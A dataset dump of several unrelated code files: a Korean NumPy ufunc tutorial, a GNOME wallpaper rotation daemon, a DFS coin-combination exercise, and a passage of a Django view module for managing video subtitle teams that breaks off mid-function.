+{"seq_id":"70046188911","text":"# 유니버셜 함수\n# ufunc라고 불리는 유니버셜 함수는 ndarray 안에 있는 데이터 원소별로 연산을 수행하는 함수다.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\narr = np.arange(10)\nprint(np.sqrt(arr))\nprint(np.exp(arr))\n\n# 단항/ 이항 유니버셜 함수가 있다.\n\n# 배열을 사용한 데이터 처리\n# 넘피 배열을 사용해서 반복문을 명시적으로 제거하는 기법을 흔히 벡터화라고 한다. 이는 순수 파이썬 연산에 비해 빠르다.\n\npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points)\n\nz = np.sqrt(xs ** 2 + ys ** 2)\nprint(z)\n\nplt.imshow(z, cmap=plt.cm.gray);\nplt.colorbar()\n\nplt.title(\"graph\")\nplt.show()\n\n# 배열 연산으로 조건절 표현하기\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n\n# 하기의 표현식과\nresult = [(x if c else y) for x, y, c in zip(xarr, yarr, cond)]\nprint(result)\n# 하기의 표현식은 같다.\nresult2 = np.where(cond, xarr, yarr)\nprint(result2)\n","repo_name":"JisangYou/Python","sub_path":"Samples_2019/PfDA/np3.py","file_name":"np3.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71889353069","text":"import re\nimport os\nimport json\nimport shlex\nimport random\nimport signal\nimport getpass\nimport threading\nimport subprocess\n\n\n################################################################################\n############################### Global variables ###############################\n################################################################################\n\n# System configurations\nROTATE_CMD = 'gsettings set org.gnome.desktop.background picture-uri file://%s'\nDEVNULL = open(os.devnull, 'wb')\n\n# Regex patterns\nREGEX_IMAGE = r'\\.(png|jpg|jpeg)$'\n\nwallpaper_path = None\nrotate_delay = None\nsleep_event = threading.Event()\nterminate = False\nimages = []\n\n\n################################################################################\n############################### Helper functions ###############################\n################################################################################\n\ndef interrupt_handler(sig_num, frame):\n \"\"\"Handle system signal interrupts\"\"\"\n global terminate\n if sig_num != signal.SIGUSR1:\n terminate = True\n sleep_event.set()\n\n\ndef shell_escape(cmd):\n \"\"\"Trivial shell escaping of a command\"\"\"\n return \"'\" + cmd.replace(\"'\", \"'\\\\''\") + \"'\"\n\n\ndef load_images():\n \"\"\"Reload images from source directory\"\"\"\n global images, wallpaper_path\n images = []\n for img in os.listdir(wallpaper_path):\n if re.search(REGEX_IMAGE, img, re.IGNORECASE):\n images.append(os.path.join(wallpaper_path, img))\n\n\n################################################################################\n################################# Script start #################################\n################################################################################\n\nif __name__ == \"__main__\":\n # Load the configuration file\n configs = None\n for path in [os.getcwd(), os.path.dirname(os.path.realpath(__file__))]:\n config_path = os.path.join(path, 'wallchd.json')\n if os.path.exists(config_path):\n with open(config_path) as conf_file:\n configs = json.loads(conf_file.read())\n break\n wallpaper_path = configs['wallpaper_path']\n rotate_delay = configs['rotate_delay']\n\n # Handle signals\n signal.signal(signal.SIGINT, interrupt_handler)\n signal.signal(signal.SIGTERM, interrupt_handler)\n signal.signal(signal.SIGUSR1, interrupt_handler)\n\n # Main event loop\n cycle_err = False\n while not terminate:\n if cycle_err:\n sleep_event.wait(5)\n sleep_event.clear()\n cycle_err = True\n\n # TODO(jtsai): Only reload images if the directory has been changed.\n try:\n load_images()\n except OSError:\n continue\n\n # HACK(jtsai): We need to get the DBUS_SESSION_BUS_ADDRESS in order for\n # Gnome settings command to properly work. For this hack, we pull the\n # D-Bus session from the environments of the actively running\n # gnome-session under the current user that wallchd is running under.\n SESSION_REGEX = r'/(gnome|cinnamon)-session(\\s+|$)'\n DBUS_REGEX = r'^DBUS_SESSION_BUS_ADDRESS=(.*)'\n dbus_addr = None\n for pid in [x for x in os.listdir('/proc') if x.isdigit()]:\n try:\n exe = os.path.realpath('/proc/%s/exe' % pid)\n except OSError:\n continue\n if re.search(SESSION_REGEX, exe):\n with open('/proc/%s/environ' % pid) as envs:\n for env in envs.read().split('\\0'):\n res = re.search(DBUS_REGEX, env)\n if res:\n dbus_addr = res.groups()[0]\n if dbus_addr is None:\n continue\n os.environ['DBUS_SESSION_BUS_ADDRESS'] = dbus_addr\n os.environ['DISPLAY'] = ':0'\n\n # Change the background image\n image_path = shell_escape(random.choice(images))\n cmd_str = ROTATE_CMD % image_path\n cmd = shlex.split(cmd_str)\n subprocess.Popen(cmd, stdout = DEVNULL, stderr = DEVNULL).wait()\n\n # Sleep rotation delay\n sleep_event.wait(rotate_delay)\n sleep_event.clear()\n cycle_err = False\n","repo_name":"dsnet/wallchd","sub_path":"wallchd.py","file_name":"wallchd.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10456587819","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\ndef DFS(S):\n if S > T :\n return\n if S == T :\n res.add(tuple(check))\n else :\n for i in range(K) :\n if check[i] < PN[i][1] :\n check[i] += 1\n DFS(S+PN[i][0])\n check[i] -= 1\n\nif __name__ == '__main__':\n T = int(input())\n K = int(input())\n PN = list()\n for _ in range(K) :\n p, n = map(int, input().split())\n PN.append((p,n))\n check = [0]*K\n res = set()\n DFS(0)\n print(len(res))","repo_name":"tlgus626/CodingTest","sub_path":"ch6/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15753520458","text":"import logging\nimport random\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q, Count\nfrom django.http import Http404, HttpResponseForbidden, HttpResponseRedirect, HttpResponse, HttpResponseBadRequest\nfrom django.shortcuts import get_object_or_404, redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils import simplejson as json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.list_detail import object_list\n\nimport teams.moderation_const as MODERATION\nimport widget\nfrom apps.auth.models import UserLanguage, CustomUser as User\nfrom apps.videos.templatetags.paginator import paginate\nfrom messages import tasks as notifier\nfrom teams.forms import (\n CreateTeamForm, AddTeamVideoForm, EditTeamVideoForm,\n AddTeamVideosFromFeedForm, TaskAssignForm, SettingsForm, TaskCreateForm,\n PermissionsForm, WorkflowForm, InviteForm, TaskDeleteForm,\n GuidelinesMessagesForm, RenameableSettingsForm, ProjectForm, LanguagesForm,\n UnpublishForm, MoveTeamVideoForm, UploadDraftForm\n)\nfrom teams.models import (\n Team, TeamMember, Invite, Application, TeamVideo, Task, Project, Workflow,\n Setting, TeamLanguagePreference, autocreate_tasks\n)\nfrom teams.permissions import (\n can_add_video, can_assign_role, can_assign_tasks, can_create_task_subtitle,\n can_create_task_translate, can_view_tasks_tab, can_invite,\n roles_user_can_assign, can_join_team, can_edit_video, can_delete_tasks,\n can_perform_task, can_rename_team, can_change_team_settings,\n can_perform_task_for, can_delete_team, can_review, can_approve,\n can_delete_video, can_remove_video\n)\nfrom teams.search_indexes import TeamVideoLanguagesIndex\nfrom teams.signals import api_teamvideo_new, api_subtitles_rejected\nfrom teams.tasks import (\n invalidate_video_caches, invalidate_video_moderation_caches,\n update_video_moderation, update_one_team_video\n)\nfrom utils import render_to, render_to_json, DEFAULT_PROTOCOL\nfrom utils.forms import flatten_errorlists\nfrom utils.panslugify import pan_slugify\nfrom utils.searching import get_terms\nfrom utils.translation import get_language_choices, languages_with_labels\nfrom videos import metadata_manager\nfrom videos.tasks import (\n upload_subtitles_to_original_service, delete_captions_in_original_service,\n delete_captions_in_original_service_by_code\n)\nfrom videos.models import Action, VideoUrl, SubtitleLanguage, SubtitleVersion\nfrom widget.rpc import add_general_settings\nfrom widget.views import base_widget_params\n\n\nimport sentry_logger # Magical import to make Sentry's error recording happen.\nassert sentry_logger # It's okay, Pyflakes. Trust me.\nlogger = logging.getLogger(\"teams.views\")\n\n\nTASKS_ON_PAGE = getattr(settings, 'TASKS_ON_PAGE', 20)\nTEAMS_ON_PAGE = getattr(settings, 'TEAMS_ON_PAGE', 10)\nMAX_MEMBER_SEARCH_RESULTS = 40\nHIGHTLIGHTED_TEAMS_ON_PAGE = getattr(settings, 'HIGHTLIGHTED_TEAMS_ON_PAGE', 10)\nCUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS = getattr(settings, 'CUTTOFF_DUPLICATES_NUM_VIDEOS_ON_TEAMS', 20)\n\nVIDEOS_ON_PAGE = getattr(settings, 'VIDEOS_ON_PAGE', 16)\nMEMBERS_ON_PAGE = getattr(settings, 'MEMBERS_ON_PAGE', 15)\nAPLICATIONS_ON_PAGE = getattr(settings, 'APLICATIONS_ON_PAGE', 15)\nACTIONS_ON_PAGE = getattr(settings, 'ACTIONS_ON_PAGE', 20)\nDEV = getattr(settings, 'DEV', False)\nDEV_OR_STAGING = DEV or getattr(settings, 'STAGING', False)\n\n\ndef index(request, my_teams=False):\n q = request.REQUEST.get('q')\n\n if my_teams and request.user.is_authenticated():\n ordering = 'name'\n qs = Team.objects.filter(members__user=request.user)\n else:\n ordering = request.GET.get('o', 'members')\n qs = Team.objects.for_user(request.user).annotate(_member_count=Count('users__pk'))\n\n if q:\n qs = qs.filter(Q(name__icontains=q)|Q(description__icontains=q))\n\n order_fields = {\n 'name': 'name',\n 'date': 'created',\n 'members': '_member_count'\n }\n order_fields_name = {\n 'name': _(u'Name'),\n 'date': _(u'Newest'),\n 'members': _(u'Most Members')\n }\n order_fields_type = {\n 'name': 'asc',\n 'date': 'desc',\n 'members': 'desc'\n }\n order_type = request.GET.get('ot', order_fields_type.get(ordering, 'desc'))\n\n if ordering in order_fields and order_type in ['asc', 'desc']:\n qs = qs.order_by(('-' if order_type == 'desc' else '')+order_fields[ordering])\n\n highlighted_ids = list(Team.objects.for_user(request.user).filter(highlight=True).values_list('id', flat=True))\n random.shuffle(highlighted_ids)\n highlighted_qs = Team.objects.filter(pk__in=highlighted_ids[:HIGHTLIGHTED_TEAMS_ON_PAGE]) \\\n .annotate(_member_count=Count('users__pk'))\n\n extra_context = {\n 'my_teams': my_teams,\n 'query': q,\n 'ordering': ordering,\n 'order_type': order_type,\n 'order_name': order_fields_name.get(ordering, 'name'),\n 'highlighted_qs': highlighted_qs,\n }\n return object_list(request, queryset=qs,\n paginate_by=TEAMS_ON_PAGE,\n template_name='teams/teams-list.html',\n template_object_name='teams',\n extra_context=extra_context)\n\n@render_to('teams/videos-list.html')\ndef detail(request, slug, project_slug=None, languages=None):\n team = Team.get(slug, request.user)\n filtered = 0\n\n if project_slug is not None:\n project = get_object_or_404(Project, team=team, slug=project_slug)\n else:\n project = None\n\n query = request.GET.get('q')\n sort = request.GET.get('sort')\n language = request.GET.get('lang')\n\n if language:\n filtered = filtered + 1\n\n if language != 'none':\n qs = team.get_videos_for_languages_haystack(\n language, user=request.user, project=project, query=query, sort=sort)\n else:\n qs = team.get_videos_for_languages_haystack(\n num_completed_langs=0, user=request.user, project=project, query=query, sort=sort)\n\n extra_context = widget.add_onsite_js_files({})\n\n extra_context['all_videos_count'] = team.get_videos_for_languages_haystack(\n None, user=request.user, project=None, query=None, sort=sort).count()\n\n extra_context.update({\n 'team': team,\n 'project':project,\n 'can_add_video': can_add_video(team, request.user, project),\n 'can_edit_videos': can_add_video(team, request.user, project),\n 'filtered': filtered\n })\n\n if extra_context['can_add_video'] or extra_context['can_edit_videos']:\n # Cheat and reduce the number of videos on the page if we're dealing with\n # someone who can edit videos in the team, for performance reasons.\n is_editor = True\n per_page = 8\n else:\n is_editor = False\n per_page = VIDEOS_ON_PAGE\n\n general_settings = {}\n add_general_settings(request, general_settings)\n extra_context['general_settings'] = json.dumps(general_settings)\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n readable_langs = TeamLanguagePreference.objects.get_readable(team)\n language_choices = [(code, name) for code, name in get_language_choices()\n if code in readable_langs]\n\n extra_context['language_choices'] = language_choices\n extra_context['query'] = query\n\n sort_names = {\n 'name': 'Name, A-Z',\n '-name': 'Name, Z-A',\n 'time': 'Time, Oldest',\n '-time': 'Time, Newest',\n 'subs': 'Subtitles, Least',\n '-subs': 'Subtitles, Most',\n }\n if sort:\n extra_context['order_name'] = sort_names[sort]\n else:\n extra_context['order_name'] = sort_names['-time']\n\n extra_context['current_videos_count'] = qs.count()\n extra_context['filtered'] = filtered\n\n team_video_md_list, pagination_info = paginate(qs, per_page, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_video_md_list'] = team_video_md_list\n extra_context['team_workflows'] = list(\n Workflow.objects.filter(team=team.id)\n .select_related('project', 'team', 'team_video'))\n\n if is_editor:\n team_video_ids = [record.team_video_pk for record in team_video_md_list]\n team_videos = list(TeamVideo.objects.filter(id__in=team_video_ids).select_related('video', 'team', 'project'))\n team_videos = dict((tv.pk, tv) for tv in team_videos)\n for record in team_video_md_list:\n if record:\n record._team_video = team_videos.get(record.team_video_pk)\n if record._team_video:\n record._team_video.original_language_code = record.original_language\n record._team_video.completed_langs = record.video_completed_langs\n\n return extra_context\n\ndef role_saved(request, slug):\n messages.success(request, _(u'Member saved.'))\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n return HttpResponseRedirect(return_path)\n\ndef completed_videos(request, slug):\n team = Team.get(slug, request.user)\n if team.is_member(request.user):\n qs = TeamVideoLanguagesIndex.results_for_members(team)\n else:\n qs = TeamVideoLanguagesIndex.results()\n qs = qs.filter(team_id=team.id).filter(is_complete=True).order_by('-video_complete_date')\n\n extra_context = widget.add_onsite_js_files({})\n extra_context.update({\n 'team': team\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return object_list(request, queryset=qs,\n paginate_by=VIDEOS_ON_PAGE,\n template_name='teams/completed_videos.html',\n extra_context=extra_context,\n template_object_name='team_video')\n\ndef videos_actions(request, slug):\n team = Team.get(slug, request.user)\n\n try:\n user = request.user if request.user.is_authenticated() else None\n member = team.members.get(user=user) if user else None\n except TeamMember.DoesNotExist:\n member = False\n\n public_only = False if member else True\n qs = Action.objects.for_team(team, public_only=public_only)\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=ACTIONS_ON_PAGE,\n template_name='teams/videos_actions.html',\n extra_context=extra_context,\n template_object_name='videos_action')\n\n@render_to('teams/create.html')\n@staff_member_required\ndef create(request):\n user = request.user\n\n if not DEV and not (user.is_superuser and user.is_active):\n raise Http404\n\n if request.method == 'POST':\n form = CreateTeamForm(request.user, request.POST, request.FILES)\n if form.is_valid():\n team = form.save(user)\n messages.success(request, _(\"\"\"\n Your team has been created. Here are some next steps:\n \n \"\"\" % dict(\n edit=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n activate=reverse(\"teams:settings_permissions\", kwargs={\"slug\": team.slug}),\n create=reverse(\"teams:settings_projects\", kwargs={\"slug\": team.slug}),\n lang=reverse(\"teams:settings_languages\", kwargs={\"slug\": team.slug}),\n custom=reverse(\"teams:settings_guidelines\", kwargs={\"slug\": team.slug}),\n )))\n return redirect(reverse(\"teams:settings_basic\", kwargs={\"slug\":team.slug}))\n else:\n form = CreateTeamForm(request.user)\n\n return { 'form': form }\n\n\n# Settings\ndef _delete_team(request, team):\n if not can_delete_team(team, request.user):\n messages.error(request, _(u'You do not have permission to delete this team.'))\n return None\n\n team.deleted = True\n team.save()\n\n return HttpResponseRedirect(reverse('teams:index'))\n\n@render_to('teams/settings.html')\n@login_required\ndef settings_basic(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST.get('delete'):\n r = _delete_team(request, team)\n if r:\n return r\n\n if can_rename_team(team, request.user):\n FormClass = RenameableSettingsForm\n else:\n FormClass = SettingsForm\n\n if request.POST:\n form = FormClass(request.POST, request.FILES, instance=team)\n\n if form.is_valid():\n try:\n form.save()\n except:\n logger.exception(\"Error on changing team settings\")\n raise\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = FormClass(instance=team)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-guidelines.html')\n@login_required\ndef settings_guidelines(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = dict((s.key_name, s.data) for s in team.settings.messages_guidelines())\n if request.POST:\n form = GuidelinesMessagesForm(request.POST, initial=initial)\n\n if form.is_valid():\n for key, val in form.cleaned_data.items():\n setting, c = Setting.objects.get_or_create(team=team, key=Setting.KEY_IDS[key])\n setting.data = val\n setting.save()\n\n messages.success(request, _(u'Guidelines and messages updated.'))\n return HttpResponseRedirect(request.path)\n else:\n form = GuidelinesMessagesForm(initial=initial)\n\n return { 'team': team, 'form': form, }\n\n@render_to('teams/settings-permissions.html')\n@login_required\ndef settings_permissions(request, slug):\n team = Team.get(slug, request.user)\n workflow = Workflow.get_for_target(team.id, 'team')\n moderated = team.moderates_videos()\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n if request.POST:\n form = PermissionsForm(request.POST, instance=team)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n if form.is_valid() and workflow_form.is_valid():\n form.save()\n\n if form.cleaned_data['workflow_enabled']:\n workflow_form.save()\n\n moderation_changed = moderated != form.instance.moderates_videos()\n if moderation_changed:\n update_video_moderation.delay(team)\n invalidate_video_moderation_caches.delay(team)\n\n messages.success(request, _(u'Settings saved.'))\n return HttpResponseRedirect(request.path)\n else:\n form = PermissionsForm(instance=team)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects.html')\n@login_required\ndef settings_projects(request, slug):\n team = Team.get(slug, request.user)\n projects = team.project_set.exclude(name=Project.DEFAULT_NAME)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n return { 'team': team, 'projects': projects, }\n\ndef _set_languages(team, codes_preferred, codes_blacklisted):\n tlps = TeamLanguagePreference.objects.for_team(team)\n\n existing = set(tlp.language_code for tlp in tlps)\n\n desired_preferred = set(codes_preferred)\n desired_blacklisted = set(codes_blacklisted)\n desired = desired_preferred | desired_blacklisted\n\n # Figure out which languages need to be deleted/created/changed.\n to_delete = existing - desired\n\n to_create_preferred = desired_preferred - existing\n to_set_preferred = desired_preferred & existing\n\n to_create_blacklisted = desired_blacklisted - existing\n to_set_blacklisted = desired_blacklisted & existing\n\n # Delete unneeded prefs.\n for tlp in tlps.filter(language_code__in=to_delete):\n tlp.delete()\n\n # Change existing prefs.\n for tlp in tlps.filter(language_code__in=to_set_preferred):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = True, False, False\n tlp.save()\n\n for tlp in tlps.filter(language_code__in=to_set_blacklisted):\n tlp.preferred, tlp.allow_reads, tlp.allow_writes = False, False, False\n tlp.save()\n\n # Create remaining prefs.\n for lang in to_create_preferred:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=True)\n tlp.save()\n\n for lang in to_create_blacklisted:\n tlp = TeamLanguagePreference(team=team, language_code=lang,\n allow_reads=False, allow_writes=False,\n preferred=False)\n tlp.save()\n\n@render_to('teams/settings-languages.html')\n@login_required\ndef settings_languages(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n preferred = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=True)]\n blacklisted = [tlp.language_code for tlp in\n TeamLanguagePreference.objects.for_team(team).filter(preferred=False)]\n initial = {'preferred': preferred, 'blacklisted': blacklisted}\n\n if request.POST:\n form = LanguagesForm(team, request.POST, initial=initial)\n\n if form.is_valid():\n _set_languages(team, form.cleaned_data['preferred'], form.cleaned_data['blacklisted'])\n\n messages.success(request, _(u'Settings saved.'))\n invalidate_video_caches.delay(team.pk)\n return HttpResponseRedirect(request.path)\n else:\n form = LanguagesForm(team, initial=initial)\n\n return { 'team': team, 'form': form }\n\n\n# Videos\n@render_to('teams/add_video.html')\n@login_required\ndef add_video(request, slug):\n team = Team.get(slug, request.user)\n\n project_id = request.GET.get('project') or request.POST.get('project') or None\n project = Project.objects.get(team=team, pk=project_id) if project_id else team.default_project\n\n if request.POST and not can_add_video(team, request.user, project):\n messages.error(request, _(u\"You can't add that video to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n initial = {\n 'video_url': request.GET.get('url', ''),\n 'title': request.GET.get('title', '')\n }\n\n if project:\n initial['project'] = project\n\n form = AddTeamVideoForm(team, request.user, request.POST or None, request.FILES or None, initial=initial)\n\n if form.is_valid():\n obj = form.save(False)\n obj.added_by = request.user\n obj.save()\n api_teamvideo_new.send(obj)\n messages.success(request, form.success_message())\n return redirect(team.get_absolute_url())\n\n return {\n 'form': form,\n 'team': team\n }\n\n@login_required\ndef move_video(request):\n form = MoveTeamVideoForm(request.user, request.POST)\n\n if form.is_valid():\n team_video = form.cleaned_data['team_video']\n team = form.cleaned_data['team']\n project = form.cleaned_data['project']\n team_video.move_to(team, project)\n messages.success(request, _(u'The video has been moved to the new team.'))\n else:\n for e in flatten_errorlists(form.errors):\n messages.error(request, e)\n\n return HttpResponseRedirect(request.POST.get('next', '/'))\n\n@render_to('teams/add_videos.html')\n@login_required\ndef add_videos(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_add_video(team, request.user):\n messages.error(request, _(u\"You can't add videos to this team/project.\"))\n return HttpResponseRedirect(team.get_absolute_url())\n\n form = AddTeamVideosFromFeedForm(team, request.user, request.POST or None)\n\n if form.is_valid():\n team_videos = form.save()\n [api_teamvideo_new.send(tv) for tv in team_videos]\n messages.success(request, form.success_message() % {'count': len(team_videos)})\n return redirect(team)\n\n return { 'form': form, 'team': team, }\n\n@login_required\n@render_to('teams/team_video.html')\ndef team_video(request, team_video_pk):\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if not can_edit_video(team_video, request.user):\n messages.error(request, _(u'You can\\'t edit this video.'))\n return HttpResponseRedirect(team_video.team.get_absolute_url())\n\n meta = team_video.video.metadata()\n form = EditTeamVideoForm(request.POST or None, request.FILES or None,\n instance=team_video, user=request.user, initial=meta)\n\n if form.is_valid():\n form.save()\n messages.success(request, _('Video has been updated.'))\n return redirect(team_video)\n\n context = widget.add_onsite_js_files({})\n\n context.update({\n 'team': team_video.team,\n 'team_video': team_video,\n 'form': form,\n 'user': request.user,\n 'widget_params': base_widget_params(request, {'video_url': team_video.video.get_video_url(), 'base_state': {}})\n })\n return context\n\n@render_to_json\n@login_required\ndef remove_video(request, team_video_pk):\n def _error_resp(request, next, error):\n if request.is_ajax():\n return { 'success': False, 'error': error }\n else:\n messages.error(request, error)\n return HttpResponseRedirect(next)\n\n team_video = get_object_or_404(TeamVideo, pk=team_video_pk)\n\n if request.method != 'POST':\n return _error_resp(request, reverse('teams:user_teams'),\n _(u'Request must be a POST request.'))\n\n next = request.POST.get('next', reverse('teams:user_teams'))\n wants_delete = request.POST.get('del-opt') == 'total-destruction'\n\n if wants_delete:\n if not can_delete_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't delete that video.\"))\n else:\n if not can_remove_video(team_video, request.user):\n return _error_resp(request, next,\n _(u\"You can't remove that video.\"))\n\n for task in team_video.task_set.all():\n task.delete()\n\n video = team_video.video\n\n team_video.delete()\n\n if wants_delete:\n video.delete()\n msg = _(u'Video has been deleted from Amara.')\n else:\n msg = _(u'Video has been removed from the team.')\n\n if request.is_ajax():\n return { 'success': True }\n else:\n messages.success(request, msg)\n return HttpResponseRedirect(next)\n\n\n# Members\n@render_to('teams/members-list.html')\ndef detail_members(request, slug, role=None):\n q = request.REQUEST.get('q')\n lang = request.GET.get('lang')\n filtered = False\n\n team = Team.get(slug, request.user)\n qs = team.members.select_related('user').filter(user__is_active=True)\n\n if q:\n filtered = True\n for term in filter(None, [term.strip() for term in q.split()]):\n qs = qs.filter(Q(user__first_name__icontains=term)\n | Q(user__last_name__icontains=term)\n | Q(user__email__icontains=term)\n | Q(user__username__icontains=term)\n | Q(user__biography__icontains=term))\n\n if lang:\n filtered = True\n qs = qs.filter(user__userlanguage__language=lang)\n\n if role:\n filtered = True\n if role == 'admin':\n qs = qs.filter(role__in=[TeamMember.ROLE_OWNER, TeamMember.ROLE_ADMIN])\n else:\n qs = qs.filter(role=role)\n\n extra_context = widget.add_onsite_js_files({})\n extra_context['filtered'] = filtered\n\n team_member_list, pagination_info = paginate(qs, MEMBERS_ON_PAGE, request.GET.get('page'))\n extra_context.update(pagination_info)\n extra_context['team_member_list'] = team_member_list\n\n # if we are a member that can also edit roles, we create a dict of\n # roles that we can assign, this will vary from user to user, since\n # let's say an admin can change roles, but not for anyone above him\n # the owner, for example\n assignable_roles = []\n if roles_user_can_assign(team, request.user):\n for member in team_member_list:\n if can_assign_role(team, request.user, member.role, member.user):\n assignable_roles.append(member)\n\n users = team.members.values_list('user', flat=True)\n user_langs = set(UserLanguage.objects.filter(user__in=users).values_list('language', flat=True))\n\n extra_context.update({\n 'team': team,\n 'query': q,\n 'role': role,\n 'assignable_roles': assignable_roles,\n 'languages': sorted(languages_with_labels(user_langs).items(), key=lambda pair: pair[1]),\n })\n\n if team.video:\n extra_context['widget_params'] = base_widget_params(request, {\n 'video_url': team.video.get_video_url(),\n 'base_state': {}\n })\n\n return extra_context\n\n@login_required\ndef remove_member(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n member = get_object_or_404(TeamMember, team=team, user__pk=user_pk)\n\n return_path = reverse('teams:detail_members', args=[], kwargs={'slug': slug})\n\n if can_assign_role(team, request.user, member.role, member.user):\n user = member.user\n if not user == request.user:\n TeamMember.objects.filter(team=team, user=user).delete()\n messages.success(request, _(u'Member has been removed from the team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'Use the \"Leave this team\" button to remove yourself from this team.'))\n return HttpResponseRedirect(return_path)\n else:\n messages.error(request, _(u'You don\\'t have permission to remove this member from the team.'))\n return HttpResponseRedirect(return_path)\n\n@login_required\ndef applications(request, slug):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n\n qs = team.applications.all()\n\n extra_context = {\n 'team': team\n }\n return object_list(request, queryset=qs,\n paginate_by=APLICATIONS_ON_PAGE,\n template_name='teams/applications.html',\n template_object_name='applications',\n extra_context=extra_context)\n\n@login_required\ndef approve_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).approve()\n messages.success(request, _(u'Application approved.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t approve applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@login_required\ndef deny_application(request, slug, user_pk):\n team = Team.get(slug, request.user)\n\n if not team.is_member(request.user):\n raise Http404\n\n if can_invite(team, request.user):\n try:\n Application.objects.get(team=team, user=user_pk).deny()\n messages.success(request, _(u'Application denied.'))\n except Application.DoesNotExist:\n messages.error(request, _(u'Application does not exist.'))\n else:\n messages.error(request, _(u'You can\\'t deny applications.'))\n\n return redirect('teams:applications', team.pk)\n\n@render_to('teams/invite_members.html')\n@login_required\ndef invite_members(request, slug):\n team = Team.get(slug, request.user)\n\n if not can_invite(team, request.user):\n return HttpResponseForbidden(_(u'You cannot invite people to this team.'))\n if request.POST:\n form = InviteForm(team, request.user, request.POST)\n if form.is_valid():\n # the form will fire the notifications for invitees\n # this cannot be done on model signal, since you might be\n # sending invites twice for the same user, and that borks\n # the naive signal for only created invitations\n form.save()\n return HttpResponseRedirect(reverse('teams:detail_members',\n args=[], kwargs={'slug': team.slug}))\n else:\n form = InviteForm(team, request.user)\n\n return {\n 'team': team,\n 'form': form,\n }\n\n@login_required\ndef accept_invite(request, invite_pk, accept=True):\n invite = get_object_or_404(Invite, pk=invite_pk, user=request.user)\n\n if accept:\n invite.accept()\n else:\n invite.deny()\n\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n@login_required\ndef join_team(request, slug):\n team = get_object_or_404(Team, slug=slug)\n user = request.user\n\n if not can_join_team(team, user):\n messages.error(request, _(u'You cannot join this team.'))\n else:\n member = TeamMember(team=team, user=user, role=TeamMember.ROLE_CONTRIBUTOR)\n member.save()\n messages.success(request, _(u'You are now a member of this team.'))\n notifier.team_member_new.delay(member.pk)\n return redirect(team)\n\ndef _check_can_leave(team, user):\n \"\"\"Return an error message if the member cannot leave the team, otherwise None.\"\"\"\n\n try:\n member = TeamMember.objects.get(team=team, user=user)\n except TeamMember.DoesNotExist:\n return u'You are not a member of this team.'\n\n if not team.members.exclude(pk=member.pk).exists():\n return u'You are the last member of this team.'\n\n is_last_owner = (\n member.role == TeamMember.ROLE_OWNER\n and not 